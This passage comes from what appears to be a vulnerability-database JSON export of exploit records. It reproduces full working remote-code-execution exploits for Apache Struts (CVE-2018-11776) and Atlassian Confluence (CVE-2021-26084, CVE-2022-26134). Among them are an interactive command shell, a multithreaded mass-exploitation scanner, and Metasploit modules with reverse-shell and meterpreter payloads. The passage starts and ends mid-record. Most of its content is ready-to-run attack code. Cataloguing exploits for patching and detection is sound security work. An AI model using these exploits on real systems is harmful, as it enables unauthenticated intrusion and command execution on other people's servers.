ValueError:\r\n pass\r\n f_file.close()\r\n except Exception as e:\r\n print(\"Error: There was an error in reading list file.\")\r\n print(\"Exception: \" + str(e))\r\n exit(1)\r\n for url in URLs_List:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n print(\"[%] Done.\")\r\n \r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)\r\n except KeyboardInterrupt:\r\n print(\"\\nKeyboardInterrupt Detected.\")\r\n print(\"Exiting...\")\r\n exit(0)\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30965", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-28T02:33:44", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30966", "href": "https://0day.today/exploit/description/30966", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter\r\n \r\nimport sys\r\nimport urllib\r\nimport urllib2\r\nimport httplib\r\n \r\n \r\ndef exploit(host,cmd):\r\n print \"[Execute]: {}\".format(cmd)\r\n \r\n ognl_payload = \"${\"\r\n ognl_payload += \"(#_memberAccess['allowStaticMethodAccess']=true).\"\r\n ognl_payload += \"(#cmd='{}').\".format(cmd)\r\n ognl_payload += \"(#iswin=(@[email\u00a0protected]('os.name').toLowerCase().contains('win'))).\"\r\n ognl_payload += \"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).\"\r\n ognl_payload += \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\r\n ognl_payload += \"(#p.redirectErrorStream(true)).\"\r\n ognl_payload += \"(#process=#p.start()).\"\r\n ognl_payload += \"(#ros=(@[email\u00a0protected]().getOutputStream())).\"\r\n ognl_payload += \"(@[email\u00a0protected](#process.getInputStream(),#ros)).\"\r\n ognl_payload += \"(#ros.flush())\"\r\n ognl_payload += \"}\"\r\n \r\n if not \":\" in host:\r\n host = \"{}:8080\".format(host)\r\n \r\n # encode the payload\r\n ognl_payload_encoded = urllib.quote_plus(ognl_payload)\r\n \r\n # further encoding\r\n url = \"http://{}/{}/help.action\".format(host, ognl_payload_encoded.replace(\"+\",\"%20\").replace(\" \", \"%20\").replace(\"%2F\",\"/\"))\r\n \r\n print \"[Url]: {}\\n\\n\\n\".format(url)\r\n \r\n try:\r\n request = urllib2.Request(url)\r\n response = urllib2.urlopen(request).read()\r\n except httplib.IncompleteRead, e:\r\n response = e.partial\r\n print response\r\n \r\n \r\nif len(sys.argv) < 3:\r\n sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])\r\nelse:\r\n exploit(sys.argv[1],sys.argv[2])\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30966", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-04T15:51:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "zdt", "title": "Confluence Server 7.12.4 - (OGNL injection) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "1337DAY-ID-36694", "href": "https://0day.today/exploit/description/36694", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.12.x versions before 7.12.5\n# Tested on: Linux Distros \n# CVE : CVE-2021-26084\n\n#!/usr/bin/python3\n\n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport optparse\n\nparser = optparse.OptionParser()\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\n\noptions, args = parser.parse_args()\nsession = requests.Session()\n\nurl_vuln = options.url\nendpoint = options.path\n\nif not options.url or not options.path:\n\n print('[+] Specify an url target')\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\n print('[+] Example help usage: exploit.py -h')\n exit()\n\n\ndef banner():\n\n print('---------------------------------------------------------------')\n print('[-] Confluence Server Webwork OGNL injection')\n print('[-] CVE-2021-26084')\n print('[-] https://github.com/h3v0x')\n print('--------------------------------------------------------------- \\n')\n\n\ndef cmdExec():\n\n while True:\n cmd = input('> ')\n xpl_url = url_vuln + endpoint\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\n\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\n print(queryStringValue)\n\n\nbanner()\ncmdExec()\n", "sourceHref": "https://0day.today/exploit/36694", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T17:20:32", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-10T00:00:00", "type": "zdt", "title": "Atlassian Confluence WebWork OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "1337DAY-ID-36730", "href": "https://0day.today/exploit/description/36730", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false, # Tomcat user\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n # /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log\n # /var/atlassian/application-data/confluence/logs/atlassian-confluence.log\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n \"/bin/bash\",\n \"-c\",\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-21T14:42:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T00:00:00", "type": "zdt", "title": "Confluence Data Center 7.18.0 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-10T00:00:00", "id": "1337DAY-ID-37783", "href": "https://0day.today/exploit/description/37783", "sourceData": "# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\n#!/usr/bin/python3\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] Stoping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37783", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T17:18:29", "description": "Confluence suffers from a pre-authentication remote code execution vulnerability that is leveraged via OGNL injection. All 7.4.17 versions before 7.18.1 are affected.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T00:00:00", "type": "zdt", "title": "Confluence OGNL Injection Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "1337DAY-ID-37778", "href": "https://0day.today/exploit/description/37778", "sourceData": "#!/usr/bin/python3\n\n# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection\n# Google Dork: N/A\n# Date: 06/006/2022\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.4.17 versions before 7.18.1\n# Tested on: -\n# CVE : CVE-2022-26134\n# https://github.com/h3v0x/CVE-2022-26134\n\nimport sys\nimport requests\nimport optparse\nimport multiprocessing\n\nfrom requests.packages import urllib3\nfrom requests.exceptions import MissingSchema, InvalidURL\nurllib3.disable_warnings()\n\nrequestEngine = multiprocessing.Manager()\nsession = requests.Session()\n\nglobal paramResults\nparamResults = requestEngine.list()\nglobals().update(locals())\n\ndef spiderXpl(url):\n globals().update(locals())\n if not url.startswith('http'):\n url='http://'+url\n \n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip, deflate\"}\n\n try:\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\n if(response.status_code == 302):\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\n\n inputBuffer = str(response.headers['X-Cmd-Response'])\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\n else:\n pass\n\n except requests.exceptions.ConnectionError:\n print('[x] Failed to Connect: '+url)\n pass\n except multiprocessing.log_to_stderr:\n pass\n except KeyboardInterrupt:\n print('[!] Stoping exploit...')\n exit(0)\n except (MissingSchema, InvalidURL):\n pass\n \n \ndef banner():\n print('[-] CVE-2022-26134')\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\n\n \ndef main():\n banner()\n \n globals().update(locals())\n \n sys.setrecursionlimit(100000)\n\n if not optionsOpt.filehosts:\n url = optionsOpt.url\n spiderXpl(url)\n else:\n f = open(optionsOpt.filehosts)\n urls = map(str.strip, f.readlines())\n\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\n try:\n multiReq.map(spiderXpl, urls)\n multiReq.close()\n multiReq.join()\n except UnboundLocalError:\n pass\n except KeyboardInterrupt:\n exit(0)\n\n\n if optionsOpt.output:\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\n\n with open(optionsOpt.output, \"w\") as f:\n for result in paramResults:\n f.write(\"%s\\n\" % result)\n f.close()\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\n optionsOpt, args = parser.parse_args()\n\n main()\n", "sourceHref": "https://0day.today/exploit/37778", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-06-08T16:37:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-08T00:00:00", "id": "PACKETSTORM:167449", "href": "https://packetstormsecurity.com/files/167449/Atlassian-Confluence-Namespace-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Confluence Namespace OGNL Injection', \n'Description' => %q{ \nThis module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to \nevaluate an OGNL expression resulting in OS command execution. \n}, \n'Author' => [ \n'Unknown', # exploited in the wild \n'bturner-r7', \n'jbaines-r7', \n'Spencer McIntyre' \n], \n'References' => [ \n['CVE', '2021-26084'], \n['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'], \n['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'], \n['URL', 'https://github.com/jbaines-r7/through_the_wire'], \n['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis'] \n], \n'DisclosureDate' => '2022-06-02', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8090 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nversion = get_confluence_version \nreturn CheckCode::Unknown unless version \n \nvprint_status(\"Detected Confluence version: #{version}\") \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl('', header: header) # empty command works for testing, the header will be set \n \nreturn CheckCode::Unknown unless res \n \nunless res && res.headers.include?(header) \nreturn CheckCode::Safe('Failed to test OGNL injection.') \nend \n \nCheckCode::Vulnerable('Successfully tested OGNL injection.') \nend \n \ndef get_confluence_version \nreturn @confluence_version if @confluence_version \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'login.action') \n) \nreturn nil unless res&.code == 200 \n \npoweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text \nreturn nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/ \n \n@confluence_version = Rex::Version.new(Regexp.last_match(1)) \n@confluence_version \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl(cmd, header: header) \n \nunless res && res.headers.include?(header) \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good(\"Successfully executed command: #{cmd}\") \nres.headers[header] \nend \n \ndef inject_ognl(cmd, header:) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'), \n'headers' => { header => cmd } \n) \nend \n \ndef ognl_payload(_cmd, header:) \n<<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '') \n${ \nClass.forName(\"com.opensymphony.webwork.ServletActionContext\") \n.getMethod(\"getResponse\",null) \n.invoke(null,null) 